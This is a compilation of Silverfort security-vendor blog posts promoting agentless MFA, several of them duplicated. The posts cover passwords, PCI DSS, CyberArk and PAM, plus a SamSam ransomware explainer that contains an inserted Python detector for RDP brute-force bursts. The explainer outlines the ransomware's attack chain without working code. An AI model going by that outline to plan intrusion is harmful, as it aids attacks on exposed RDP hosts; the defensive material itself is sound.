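$report | Sort-Object Patched, NlaEnabled | Format-Table -AutoSize
$report | Export-Csv -Path .\bluekeep-rdp-posture.csv -NoTypeInformation
```

Run it read-only first and review the CSV; NLA enforcement only raises the bar for unauthenticated connections, so hosts flagged as unpatched still need the update.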
Silverfort enables organizations to implement a holistic zero-trust security model without deploying software agents or proxies, and without requiring changes to existing networks. Its innovative architecture ensures secure access to any system, no matter where it is, or what it is. This includes user-to-machine and machine-to-machine access, as well as any administrative access. Because Silverfort avoids any modifications to existing assets and infrastructure, it allows not only small agile companies but also large traditional enterprises to achieve zero-trust security throughout their networks.

Yaron Kassner, CTO and Co Founder, Silverfort

Silverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that, Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, rose to the rank of Captain, and received a prestigious excellence award. Yaron holds a B.Sc. in Mathematics, Summa Cum Laude, and an M.Sc. and Ph.D. in Computer Science from the Technion – Israel Institute of Technology.

Want to learn more or see a demo? Contact us today!

---
- Published: 2019-05-02
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/passwords-cant-rely-on-them-cant-live-without-them/

By Dana Tamir, VP Market Strategy, Silverfort

May 2nd, 2019 is National Password Day - a good opportunity to discuss our ‘love-hate’ relationship with passwords. There are many reasons why we can’t rely on password-only authentication mechanisms. Yet we can’t really get rid of them either. Let me explain:

### The Problem with Passwords

When users are asked to create passwords – whether they are opening new accounts or changing passwords of existing accounts – they are likely to choose passwords they can remember.
The problem is that many users choose weak passwords that can be easily guessed. A recently published list of the most commonly used passwords in 2018 shows a grim picture. It claims the most commonly used password is ‘123456’, and the 2nd spot goes to the obvious choice, ‘password’.

True, some people use stronger passwords. However, many reuse the same password across multiple systems and websites. Research shows that 52% reuse the same password for multiple, but not all, accounts, while another 13% reuse the same password for all of their accounts. Some even use the same passwords across both work-related systems and personal applications. This makes a stolen or compromised user password more valuable than ever.

And, if you think that requiring users to regularly change their passwords can help, well, I’m sorry to tell you it doesn’t. That’s because those who do regularly change their passwords too often make only small and predictable changes to their existing passwords. One reason for this weakness might well be their emotional connection to their password selection routine. This is the reason behind Microsoft’s recent announcement that it will be dropping the password expiration policies: “Periodic password expiration is an ancient and obsolete mitigation of very low value, and we don’t believe it’s worthwhile for our baseline to enforce any specific value. By removing it from our baseline rather than recommending a particular value or no expiration, organizations can choose whatever best suits their perceived needs without contradicting our guidance,” explains Aaron Margosis.

No wonder that brute-force attacks, which use a trial-and-error method to obtain a user’s password, and phishing scams, which fraudulently attempt to obtain users’ passwords by disguising themselves as communications from trusted people or organizations, are on the rise.

### Data Breaches Involving Compromised Credentials On The Rise

Considering everything we’ve discussed so far, it’s not surprising that compromised credentials are leveraged in more and more breaches. In fact, 4 out of 5 breaches today involve the use of compromised credentials. The problem is that when passwords or their corresponding hashes are stolen, it’s difficult to detect or restrict their unauthorized use. Or is it?

### Why Can’t We Live Without Them?

Why can’t we get rid of passwords? Surely someone can come up with a better solution to authenticate users? Yes, that’s true - there are better ways to authenticate users and validate their identities. However, passwords aren’t going away anytime soon. You see, our corporate networks are built on password-based authentication protocols, and these protocols will stay with us for many years. Many of our homegrown and legacy systems are designed for password-only authentication. Modifying our network protocols and changing the authentication methods of existing systems and servers just to avoid passwords isn’t practical. So no, passwords aren't going away any time soon.

### If You Can’t Get Rid of Passwords - Add Another Layer To Them

The reality is that password-only authentication mechanisms aren’t secure enough. So what can be done to make authentication processes more secure? The answer has been known for a while: layer them with an additional authentication mechanism. Multi-Factor Authentication (MFA) solutions, sometimes referred to as 2FA, have been available for decades. They provide that additional authentication layer by requiring users to authenticate with an additional factor before they are granted access to sensitive systems. Over the years they have been proven as an effective and critical security measure to prevent the exploitation of stolen/compromised credentials.

### So Why Aren’t We Using Them To Protect All Of Our Sensitive Systems?

While many organizations are looking to protect many proprietary, homegrown and legacy systems with MFA, they find it very difficult to do. That’s because mainstream MFA solutions require either the implementation of software agents on each protected system, or implementation of proxies, or local configurations and integrations. These requirements make it difficult and sometimes impossible to deploy them on these types of systems.

### How Can Silverfort Help?

Silverfort offers the first agentless, proxyless authentication platform, seamlessly enabling MFA for any sensitive system, including those that couldn’t be protected until today. These include: proprietary, homegrown and legacy systems, critical IT infrastructure, file shares and databases, IoT devices, SCADA servers, medical systems like PACS and EHR, and many more. If you want to learn more, please contact us.

Final Note: As I wrote this blog, I was reminded of a brilliant campaign that launched a few years ago (don’t know the source):

Treat your passwords like your underwear:
- Never share them with anyone
- Change them regularly
- Keep them off your desk

I’d like to suggest a 4th recommendation:
- Put something over them...

Dana Tamir, VP Market Strategy, Silverfort

Dana is a veteran of the cybersecurity industry with over 15 years of real-world expertise and leadership roles in leading security companies. Prior to Silverfort, Dana served as VP Marketing at Indegy. Before that, she served as Director of Enterprise Security at Trusteer (acquired by IBM in 2012). She also held various roles at Imperva, Symantec, Bindview, and Amdocs. Dana holds an engineering degree from the Technion – Israel Institute of Technology, in addition to a number of industry and vendor certifications.

To learn more about Silverfort and see a demo, contact us today! Wishing everyone a Happy National Password Day!
---
- Published: 2019-02-11
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/3-ways-agentless-mfa-successfully-tackles-pci-dss-8-3-1-challenges/

One of the most common questions we get from customers is regarding requirement 8.3.1 of PCI DSS v3.2: In its latest revision, PCI extends MFA as a requirement for all personnel with administrative access (console and non-console), in addition to any personnel with remote access to the Cardholder Data Environment (CDE).

The requirement to secure all administrative access to the CDE with MFA should come as no surprise. After all, most data breaches in the retail sector involve unauthorized access to the cardholder data environment. PCI explains that the effectiveness of passwords as an authentication mechanism is questionable, therefore additional security measures are required. In fact, in an interview with Troy Leach, PCI Security Standards Council Chief Technology Officer, he explains:

"The most important point is that the change to the requirement is intended for all administrative access into the cardholder data environment, even from within a company’s own network. This applies to any administrator, whether it be a third party or internal, that has the ability to change systems and other credentials within that network to potentially compromise the security of the environment."

So there’s no doubt that the requirement makes sense. However, addressing this requirement is not trivial in most CDE environments due to the nature of the systems and tools in scope.

### Where's the challenge?

The scope of the CDE includes any systems that process, store and/or transmit cardholder and payment data, as well as anything that directly connects to, or supports, this environment. This means that you need to enforce MFA on the following systems and tools that are typically found in CDEs:

- Any homegrown system that processes, stores or transmits credit card and payment data
- All relevant production servers – Windows and Linux
- Critical IT infrastructure – including hypervisors, vCenter, network devices, file shares, databases
- Virtual Private Network (VPN)
- Virtual Desktop Infrastructure (VDI)
- PAM solutions (like CyberArk)
- Remote Desktop (RDP)
- Secure Shell (SSH)
- Any cloud services that might be part of the processing

As you can see, depending on the mix of systems and tools in your CDE environment, not only will you need to implement multiple MFA solutions or complex network segmentation -- a difficult task on its own -- it would be unfeasible for many of these systems. Why? Because no out-of-the-box support is available, or because their sensitive and critical nature won’t allow you to deploy any software agents or proxies, or make any configuration changes. After all, nobody wants to risk the availability and stability of any critical production system.

### Securing All CDE Access with Silverfort’s Agentless MFA

Silverfort’s holistic authentication platform enables organizations to add MFA to any system -- including systems that were considered unprotectable until today -- without deploying any software agents, implementing proxies or requiring any configuration changes. This enables our customers to easily protect all their CDE systems, as well as any access to those systems, and address PCI DSS requirement 8.3.1. Here's how:

### How does it work?

1) Silverfort monitors and analyzes all user access requests across all systems and environments by looking at the authentication protocols.
This means that it doesn’t need to integrate with any CDE system or require the use of any software agents.

2) By adding MFA on top of the authentication protocols, rather than per system, Silverfort can protect any system, including homegrown applications, sensitive production servers, PAM solutions and administrative access (RDP, SSH), IT infrastructure and more.

3) Silverfort continuously analyzes risk and trust levels across the network using an advanced AI-driven risk engine. Because Silverfort monitors and analyzes all user and machine access requests -- and isn’t limited to specific protected systems -- it analyzes about 50x more information than any other adaptive authentication solution. This enables it to accurately detect behavior-based anomalies and recognize malicious patterns such as brute-force attacks, lateral movement, ransomware and more, and apply effective risk-based authentication policies to block threats in real time. What's better, it does all this while allowing legitimate users to continue their work with minimal disruptions. It can also step up authentication requirements in response to third-party security alerts.

Pretty cool, but what about a real-life scenario? We're glad you asked!

### BlueSnap Customer Case Study

To comply with PCI DSS requirement 8.3, BlueSnap, a global payment processor, needed to implement MFA on VMware vCenter Server, which is the IT infrastructure supporting the Cardholder Data Environment, as well as for any access to production Linux servers. They needed an MFA solution that does not require special integration or installation of software agents. They selected Silverfort to secure all privileged access, including RDP, SSH, and admin access to vCenter. The implementation was quick and easy. A proof of concept was set up in just a couple of hours, and within a month BlueSnap extended the solution to secure privileged access in all offices across the globe.

Download the solution brief: BlueSnap-Case-Study-MFA-for-Sensitive-Assets.pdf

In addition to the 8.3.1 requirement, Silverfort can address other PCI DSS requirements with a unique and holistic approach – ask us for a demo to learn more.

---
- Published: 2019-02-11
- Modified: 2024-09-09
- URL: https://www.silverfort.com/blog/3-ways-agentless-mfa-successfully-tackles-pci-dss-8-3-1-challenges-2/

One of the most common questions we get from our customers is regarding requirement 8.3.1 of PCI DSS v3.2: In its latest revision, PCI extends MFA as a requirement for all personnel with administrative access (console and non-console), in addition...

---
- Published: 2019-01-22
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/simplify-strengthen-authentication-cyberark-silverforts-agentless-mfa/

We are proud to announce Silverfort’s integration with CyberArk. The joint Silverfort and CyberArk Privileged Access Security Solution enables our joint customers to simplify and secure privileged access with an agentless MFA platform. Since the solution has been made available on the CyberArk Marketplace, many customers have expressed their interest and overall market response has been very positive.

“Silverfort’s Agentless MFA solution provides out-of-the-box protection for the CyberArk Privileged Access Security Solution,” says Silverfort’s CEO Hed Kovetz. “Not only does it enable our customers to easily strengthen secure access, it also simplifies user workflows, delivering tremendous value to our customers.”

### Why are customers so excited about the offering?

Customers are excited about Silverfort’s MFA offering because it enables them to:

- Strengthen authentication into the CyberArk Privileged Access Security Solution with an agentless MFA solution that does not require cumbersome integrations, modifications to CyberArk, or changes to user workflows.
- Simplify secure privileged access and reduce administrative connection time to the CyberArk Privileged Session Manager for Windows with a single authentication that does not require Time-based One-time Password (TOTP) tokens and eliminates the need to wait for One-time Passwords (OTP) to expire between sessions.
- User-friendly 2nd authentication factor: Silverfort’s mobile app provides push notifications allowing users to easily authenticate and continue to work. Silverfort’s browser notifications or third-party tokens can be used as alternatives.
- Get a comprehensive audit trail, informative dashboards with insights and investigative drill-down capabilities.
- Reduce MFA deployment time, resource investment and maintenance costs.

### Simplifying Secure Access and Reducing Connection Time to Multiple Sessions with Agentless MFA

Protecting privileged access to sensitive systems and resources is critical to organizations. If privileged accounts, credentials or secrets become compromised, an adversary may gain unfettered access to the organization’s crown jewels. This is why CyberArk recommends enforcing MFA for its solution.

Silverfort provides a single 2nd authentication factor to the CyberArk Privileged Access Security Solution, including Privileged Session Manager (including the RDP and SSH Proxies). Once implemented, users no longer need to use RADIUS OTP-based PIN codes in order to authenticate to each session. Instead, Silverfort’s mobile app provides push notifications, which are a user-friendly 2nd authentication factor. Silverfort’s browser notifications or third-party tokens can be used as alternatives.

Silverfort’s unique ability to provide MFA to Microsoft Single Sign-On and Active Directory based authentication enables Silverfort to bring frictionless MFA to CyberArk users. It eliminates the need to wait for OTPs to expire between sessions and greatly simplifies secure administrative access to multiple sessions, improving the administrative user’s experience.
Strengthening Authentication Without Any Agents, Proxies or Changes to CyberArk Silverfort’s agentless MFA delivers seamless strong authentication to the CyberArk Privileged Access Security Solution without requiring agents or changes to user endpoints or servers, without inline proxies and without any changes to CyberArk. Unlike traditional MFA solutions that typically require agents or complex integrations and are often challenging to implement for the RDP Proxy, Silverfort’s agentless non-intrusive approach is easy to implement. The agentless architecture minimizes implementation time and maintenance costs. Setting up the required authentication policies in Silverfort’s Management Console takes only minutes and does not require any changes on CyberArk’s side. Seamless Non-Intrusive Deployment Architecture Download the solution brief The Silverfort Authentication Platform is delivered as a virtual appliance. It does not require any software agents or local configurations on corporate endpoints and servers, or any changes to existing CyberArk configurations. Silverfort monitors all user authentication requests for accessing the CyberArk Privileged Access Security Solution and requires users to confirm their identity according to the authentication policies. Silverfort’s web-based admin console enables security admins to easily apply strong authentication policies across the organization, identify authentication vulnerabilities, and achieve broad visibility and auditing of authentication and access activity. Why wait any longer? Contact us today to schedule a pilot in your organization. --- - Published: 2019-01-22 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/simplify-strengthen-authentication-cyberark-silverforts-agentless-mfa-2/ We are proud to announce Silverfort’s integration with CyberArk. 
The joint Silverfort and CyberArk Privileged Access Security Solution enables our joint customers to simplify and secure privileged access with an agentless MFA platform. We are proud to announce Silverfort’s integration with CyberArk. Since the solution was made available on the CyberArk Marketplace, many customers have expressed their interest, and the overall market response has been very positive.

“Silverfort’s Agentless MFA solution provides out-of-the-box protection for the CyberArk Privileged Access Security Solution,” says Silverfort’s CEO Hed Kovetz. “Not only does it enable our customers to easily strengthen secure access, it also simplifies user workflows, delivering tremendous value to our customers.”

### Why are customers so excited about the offering?

Customers are excited about Silverfort’s MFA offering because it enables them to:

- Strengthen authentication into the CyberArk Privileged Access Security Solution with an agentless MFA solution that does not require cumbersome integrations, modifications to CyberArk, or changes to user workflows.
- Simplify secure privileged access and reduce administrative connection time to the CyberArk Privileged Session Manager for Windows with a single authentication that does not require Time-based One-time Password (TOTP) tokens and eliminates the need to wait for One-time Passwords (OTP) to expire between sessions.
- Use a friendly second authentication factor: Silverfort’s mobile app provides push notifications that let users authenticate easily and continue working. Silverfort’s browser notifications or third-party tokens can be used as alternatives.
- Get a comprehensive audit trail, informative dashboards with insights, and investigative drill-down capabilities.
- Reduce MFA deployment time, resource investment and maintenance costs.

### Simplifying Secure Access and Reducing Connection Time to Multiple Sessions with Agentless MFA

Protecting privileged access to sensitive systems and resources is critical to organizations. If privileged accounts, credentials or secrets become compromised, an adversary may gain unfettered access to the organization’s crown jewels. This is why CyberArk recommends enforcing MFA for its solution.

Silverfort provides a single second authentication factor to the CyberArk Privileged Access Security Solution, including Privileged Session Manager (including the RDP and SSH Proxies). Once implemented, users no longer need to use RADIUS OTP-based PIN codes to authenticate to each session. Instead, Silverfort’s mobile app provides push notifications, which are a user-friendly second authentication factor. Silverfort’s browser notifications or third-party tokens can be used as alternatives.

Silverfort’s unique ability to provide MFA to Microsoft Single Sign-On and Active Directory based authentication enables Silverfort to bring frictionless MFA to CyberArk users. It eliminates the need to wait for OTPs to expire between sessions and greatly simplifies secure administrative access to multiple sessions, improving the administrative user’s experience.

### Strengthening Authentication Without Any Agents, Proxies or Changes to CyberArk

Silverfort’s agentless MFA delivers seamless strong authentication to the CyberArk Privileged Access Security Solution without requiring agents or changes to user endpoints or servers, without inline proxies and without any changes to CyberArk. Unlike traditional MFA solutions, which typically require agents or complex integrations and are often challenging to implement for the RDP Proxy, Silverfort’s agentless, non-intrusive approach is easy to implement. The agentless architecture minimizes implementation time and maintenance costs. Setting up the required authentication policies in Silverfort’s Management Console takes only minutes and does not require any changes on CyberArk’s side.

### Seamless Non-Intrusive Deployment Architecture

The Silverfort Authentication Platform is delivered as a virtual appliance. It does not require any software agents or local configurations on corporate endpoints and servers, or any changes to existing CyberArk configurations. Silverfort monitors all user authentication requests for accessing the CyberArk Privileged Access Security Solution and requires users to confirm their identity according to the authentication policies. Silverfort’s web-based admin console enables security admins to easily apply strong authentication policies across the organization, identify authentication vulnerabilities, and achieve broad visibility and auditing of authentication and access activity.

Why wait any longer? Contact us today to schedule a pilot in your organization.

---

- Published: 2019-01-04
- Modified: 2024-09-09
- URL: https://www.silverfort.com/blog/passwords-cant-rely-on-them-cant-live-without-them-2/

By Dana Tamir, VP Market Strategy, Silverfort

May 2nd, 2019 is National Password Day - a good opportunity to discuss our ‘love-hate’ relationship with passwords. There are many reasons why we can’t rely on password-only authentication mechanisms. Yet we can’t really get rid of them either. Let me explain:

### The Problem with Passwords

When users are asked to create passwords – whether they are opening new accounts or changing passwords of existing accounts – they are likely to choose passwords they can remember. The problem is that many users choose weak passwords that can be easily guessed. A recently published list of the most commonly used passwords in 2018 shows a grim picture. It claims the most commonly used password is ‘123456’, and in second place is the obvious choice, ‘password’. True, some people use stronger passwords.
However, many reuse the same password across multiple systems and websites. Research shows that 52% reuse the same password for multiple, but not all, accounts, while another 13% reuse the same password for all of their accounts. Some even use the same passwords across both work-related systems and personal applications. This makes a stolen or compromised user password more valuable than ever.

And if you think that requiring users to regularly change their passwords can help, well, I’m sorry to tell you it doesn’t. That’s because those who do regularly change their passwords too often make only small and predictable changes to their existing passwords. One reason for this weakness might well be their emotional connection to their password selection routine. This is the reason behind Microsoft’s recent announcement that it will be dropping the password expiration policies: “Periodic password expiration is an ancient and obsolete mitigation of very low value, and we don’t believe it’s worthwhile for our baseline to enforce any specific value. By removing it from our baseline rather than recommending a particular value or no expiration, organizations can choose whatever best suits their perceived needs without contradicting our guidance,” explains Aaron Margosis.

No wonder that brute-force attacks, which use a trial-and-error method to obtain a user’s password, and phishing scams, which fraudulently attempt to obtain users’ passwords by posing as communications from trusted people or organizations, are on the rise.

### Data Breaches Involving Compromised Credentials On The Rise

Considering everything we’ve discussed so far, it’s not surprising that compromised credentials are leveraged in more and more breaches. In fact, 4 out of 5 breaches today involve the use of compromised credentials. The problem is that when passwords or their corresponding hashes are stolen, it’s difficult to detect or restrict their unauthorized use. Or is it?

### Why Can’t We Live Without Them?

Why can’t we get rid of passwords? Surely someone can come up with a better solution to authenticate users? Yes, that’s true - there are better ways to authenticate users and validate their identities. However, passwords aren’t going away anytime soon. You see, our corporate networks are built on password-based authentication protocols, and these protocols will stay with us for many years. Many of our homegrown and legacy systems are designed for password-only authentication. Modifying our network protocols and changing the authentication methods of existing systems and servers just to avoid passwords isn’t practical. So no, passwords aren't going away any time soon.

### If You Can’t Get Rid of Passwords - Add Another Layer To Them

The reality is that password-only authentication mechanisms aren’t secure enough. So what can be done to make authentication processes more secure? The answer has been known for a while: layer them with an additional authentication mechanism. Multi-Factor Authentication (MFA) solutions, sometimes referred to as 2FA, have been available for decades. They provide that additional authentication layer by requiring users to authenticate with an additional factor before they are granted access to sensitive systems. Over the years they have proven to be an effective and critical security measure to prevent the exploitation of stolen or compromised credentials.

### So Why Aren’t We Using Them To Protect All Of Our Sensitive Systems?

While many organizations are looking to protect their proprietary, homegrown and legacy systems with MFA, they find it very difficult to do. That’s because mainstream MFA solutions require either the implementation of software agents on each protected system, or the implementation of proxies, or local configurations and integrations. These requirements make it difficult and sometimes impossible to deploy them on these types of systems.

### How Can Silverfort Help?

Silverfort offers the first agentless, proxy-less authentication platform, seamlessly enabling MFA for any sensitive system, including those that couldn’t be protected until today. These include proprietary, homegrown and legacy systems, critical IT infrastructure, file shares and databases, IoT devices, SCADA servers, medical systems like PACS and EHR, and many more. If you want to learn more, please contact us.

Final Note: As I wrote this blog, I was reminded of a brilliant campaign that launched a few years ago (I don’t know the source):

Treat your passwords like your underwear:

- Never share them with anyone
- Change them regularly
- Keep them off your desk

I’d like to suggest a 4th recommendation: Put something over them...

Dana Tamir, VP Market Strategy, Silverfort

Dana is a veteran of the cybersecurity industry with over 15 years of real-world expertise and leadership roles in leading security companies. Prior to Silverfort, Dana served as VP Marketing at Indegy. Before that, she served as Director of Enterprise Security at Trusteer (acquired by IBM in 2012). She also held various roles at Imperva, Symantec, Bindview, and Amdocs. Dana holds an engineering degree from the Technion – Israel Institute of Technology, in addition to a number of industry and vendor certifications.

To learn more about Silverfort and see a demo, contact us today! Wishing everyone a Happy National Password Day!

---

- Published: 2018-12-02
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/how-to-stop-iranian-samsam-hackers-from-taking-your-network-for-ransom/

By Yaron Kassner, CTO and Co-Founder, Silverfort

SamSam – sounds cute, right? Well, it’s not.
SamSam is a destructive ransomware that affected more than 200 victims across the US, including hospitals, city governments, and other organizations in 2018. On November 28, the US Department of Justice charged two Iranian nationals with computer hacking offenses in connection with the global SamSam ransomware outbreak. The alleged criminals are currently in Iran, out of the reach of US law enforcement, and I doubt the two suspects will travel to the U.S. to face questioning. I also doubt that these attacks will stop. So, it’s important to understand how this attack operates and implement some protective measures.

### Compromising the First Endpoint

SamSam targets computers that are open to remote desktop connections from the internet. Finding such endpoints is super easy: free tools like Shodan can provide a list of such machines. As of today, there are 2,475,311 records of remote desktops open to the Internet in Shodan. The passwords to these desktops can be obtained with brute-force attacks or simply purchased on the dark web. The increased use of cloud environments puts organizations at risk, because a reckless admin could easily expose a machine in the cloud without protecting access to it from the internet.

### Moving Deeper into the Network

SamSam doesn’t only encrypt the files of a single infected endpoint. Once the endpoint is compromised, SamSam utilizes stolen credentials and exploits vulnerabilities like EternalBlue to move laterally across the network. It uses “living off the land” techniques, i.e. existing administration tools. This enables the ransomware to reach more valuable servers that hold more valuable data. Instead of holding one computer hostage, it takes over the entire network. Backups are often thought of as a defense mechanism for ransomware prevention. However, the ability to move laterally in the network also enables SamSam to reach these backups and render them useless. A victim whose backups were encrypted would have to pay the ransom or lose the data.

### SamSam Mitigation Costs Exceed the Ransom Payment

So far, the hackers have made more than $6M in ransom. However, the costs to impacted organizations are much higher, because after paying the ransom and unlocking their files, they also need to make sure that the threat is completely removed from their networks. When the city of Atlanta was infected, it spent a total of $17M in efforts to resolve the incident, even though the ransom requested was much lower than that. In addition to the cost of the ransom, there is the obvious cost of the outage inflicted until the threat is removed. Perhaps that’s one of the reasons the malware is attacking so many healthcare providers – they can’t afford to go down.

### How to Protect Your Organization from SamSam Ransomware

Backup your data offline: If you’re counting on your backups to save you from ransomware, you need to make sure that the attacker won’t get to your backups as well. Keep in mind that saving your backups in the network means that they are exposed to ransomware just as much as any other data in the network.

Identify remote desktop servers that are exposed over the internet: Find a way to discover remote desktops that are exposed over the internet. An exposed remote desktop will be subject to a brute-force attack within hours of the exposure over the internet. So, a good way to identify internet-exposed remote desktops is to look for brute-force attacks. Silverfort can help you do that.

Protect RDP access by enforcing Multi-Factor Authentication: If you have to expose a remote desktop to the internet, use a VPN or a bastion host. These prevent direct network access to the machine. But password-based authentication isn’t enough. You should also add MFA to validate that the credentials are indeed used by a legitimate user. Silverfort enables you to add MFA to these systems without any agents.
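The two recommendations just given (spot internet-exposed remote desktops by the brute-force attempts they attract, then put MFA in front of them) can be turned into a simple detection rule over a Windows Security log export. The following is an added example, not code from the original post or from Silverfort: it reads constructed 4625/4624 records (the CSV field names and the internal address ranges are assumptions, not a vendor schema), flags any source that fails RDP logons (logon type 10) ten times within a five-minute window, and reports whether the source sits outside the internal ranges and whether a successful logon followed the burst.

```python
"""Spot RDP brute-force bursts in a Windows Security log export (added example).

Context from the post above: an RDP server reachable from the internet attracts
brute-force attempts within hours, so a host that logs many failed
RemoteInteractive logons (event 4625, logon type 10) from addresses outside the
internal ranges is a strong hint that it is exposed. Field names are assumptions.
"""
import csv
import io
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample export (not real data); 203.0.113.0/24 is a documentation range.
SAMPLE_CSV = """timestamp,event_id,logon_type,target_user,source_ip,host
2018-11-28T03:00:01,4625,10,administrator,203.0.113.7,JUMP01
2018-11-28T03:00:02,4625,10,admin,203.0.113.7,JUMP01
2018-11-28T03:00:04,4625,10,backup,203.0.113.7,JUMP01
2018-11-28T03:00:05,4625,10,sqlsvc,203.0.113.7,JUMP01
2018-11-28T03:00:07,4625,10,administrator,203.0.113.7,JUMP01
2018-11-28T03:00:09,4625,10,jsmith,203.0.113.7,JUMP01
2018-11-28T03:00:10,4625,10,helpdesk,203.0.113.7,JUMP01
2018-11-28T03:00:11,4625,10,guest,203.0.113.7,JUMP01
2018-11-28T03:00:12,4625,10,operator,203.0.113.7,JUMP01
2018-11-28T03:00:14,4625,10,administrator,203.0.113.7,JUMP01
2018-11-28T03:00:30,4624,10,administrator,203.0.113.7,JUMP01
2018-11-28T08:15:00,4625,10,dtamir,10.0.4.22,FILESRV02
2018-11-28T08:15:40,4625,10,dtamir,10.0.4.22,FILESRV02
2018-11-28T09:00:00,4625,3,svc_backup,10.0.9.5,FILESRV02
"""

# Assumption: the organization's internal address space (adjust to your own).
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
RDP_LOGON_TYPE = "10"           # RemoteInteractive, i.e. RDP
WINDOW = timedelta(minutes=5)   # sliding window for counting failures
THRESHOLD = 10                  # failures per window that raise a finding


def is_internal(ip):
    """True if the address belongs to one of the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_events(text):
    """Parse the CSV export and sort it by time; 'ts' becomes a datetime."""
    rows = list(csv.DictReader(io.StringIO(text)))
    for r in rows:
        r["ts"] = datetime.fromisoformat(r["timestamp"])
    return sorted(rows, key=lambda r: r["ts"])


def detect_rdp_bruteforce(events, window=WINDOW, threshold=THRESHOLD):
    """Return one finding per (source_ip, host) pair whose failed RDP logons reach
    `threshold` inside any `window`. Each finding records how many distinct
    accounts were tried (a spray pattern), whether the source is outside the
    internal ranges (so the host is reachable from the internet), and whether a
    4624 success from the same source followed the burst within one window."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for e in events:
        if e["logon_type"] != RDP_LOGON_TYPE:
            continue  # only RDP logons matter for this rule
        key = (e["source_ip"], e["host"])
        if e["event_id"] == "4625":
            failures[key].append(e)
        elif e["event_id"] == "4624":
            successes[key].append(e["ts"])

    findings = []
    for (src, host), evs in failures.items():
        start = 0
        for end in range(len(evs)):
            # Advance the window start until evs[start:end+1] spans at most `window`.
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst = evs[start:end + 1]
                last_fail = burst[-1]["ts"]
                findings.append({
                    "source_ip": src,
                    "host": host,
                    "failures": len(burst),
                    "distinct_users": len({b["target_user"] for b in burst}),
                    "external_source": not is_internal(src),
                    "success_after_burst": any(
                        last_fail <= s <= last_fail + window
                        for s in successes[(src, host)]),
                })
                break  # one finding per source/host pair is enough
    return findings


if __name__ == "__main__":
    for finding in detect_rdp_bruteforce(parse_events(SAMPLE_CSV)):
        print(finding)
```

A host that appears in a finding with `external_source` set is a candidate for the VPN, bastion and MFA controls described above; a finding with `success_after_burst` set is an incident, not just an exposure.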
Prevent lateral movement: Enforcing MFA on the use of administrative tools such as PsExec can effectively block such attacks. However, traditional MFA solutions can’t be implemented for such tools. Silverfort’s agentless MFA platform can be easily extended to these tools as well.

Protect access to your sensitive data: Enforce MFA for any access to sensitive resources, including databases and file shares.

Yaron Kassner, CTO and Co-Founder, Silverfort

Silverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that, Yaron served in the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, rose to the rank of Captain, and received a prestigious excellence award. Yaron holds a B.Sc. in Mathematics, Summa Cum Laude, and an M.Sc. and Ph.D. in Computer Science from the Technion – Israel Institute of Technology.

To find out how Silverfort can protect your organization against SamSam and other threats, contact us today.

---

- Published: 2018-11-18
- Modified: 2024-09-09
- URL: https://www.silverfort.com/blog/pam-is-king-but-who-is-protecting-the-king-2/

By Jonathan Nativ, Sales Director, APAC, Silverfort

In the game of chess, the king is the most important piece. Once your opponent gets your king, the game is over. Yet the king is a relatively vulnerable piece, and it’s protected by stronger ones like rooks, bishops and of course - the queen. In the IT world, Privileged Access Management (PAM) (many times referred to as a Password Vault) is the ‘King’ because it stores the keys to the kingdom - the credentials of the most important and sensitive users in the organization (privileged users) - and many times it is used as the entry point into the organization for external users. Therefore, adversaries will do all they can in order to compromise it.

### What is a PAM Solution and Why is it Important to Protect?

The PAM solution is a centralized repository where all the sensitive credentials are stored and managed. This includes:

1. Domain Administrator credentials
2. Database credentials
3. Cloud infrastructure credentials and access keys
4. Firewall passwords
5. Corporate social media accounts
6. Many more

One key thing to note about PAM solutions is that, once implemented, the PAM solution becomes the single most sensitive system in the network, as it contains all the credentials of the most privileged users. According to Gartner, securing privileged accounts in an organization is a top-priority security project these days. This is due to the fact that compromised credentials were used in more than 80% of data breaches. When attackers gain access to the network, the first thing they are going to look for is privileged credentials. These credentials will allow them to access high-value assets, move laterally in the network and install malicious software.

What if one of your system administrators (who uses the PAM solution) falls victim to a phishing attack and their personal credentials are stolen? If those credentials allow access to the PAM solution, the attacker now has access to all the credentials that have been conveniently stored in one central location. If an adversary gains access to the PAM solution, he or she literally gains unlimited access to any sensitive system in the network. Adding Multi-Factor Authentication (MFA) provides a critical layer of security against the use of stolen user credentials. For that reason, PAM vendors strongly recommend always implementing an MFA solution together with the PAM solution.

### So How Should I Protect my King?

In a recent paper published by Deloitte, PAM and MFA are ranked as the two top identity initiatives for enterprises, with equal importance. These two important initiatives go hand in hand – putting all your sensitive passwords in one place doesn’t make much sense if attackers could easily access it with yet another password. Once the PAM solution is protected with MFA, even if an attacker gets the stolen credentials of a system administrator, the attacker will not be able to access the PAM solution. This is because an additional factor of authentication (like a token or approval through a mobile application) is required from the user before access is granted.

When selecting and implementing an MFA solution, it is key to make sure that all the interfaces to the PAM solution are protected by MFA – not just the front door. This may be easier said than done. Let me explain: Most PAM solutions have several interfaces, including:

1. Web Portal Access - used for credential retrieval as well as administrative tasks
2. Proxy Access - used by system administrators to connect to systems using vaulted credentials (this is the method preferred by system administrators, as it is more transparent)
3. API Access - used for automated tasks and service accounts

The image above shows a basic high-level architecture of a typical PAM solution.

### Here Comes the Queen

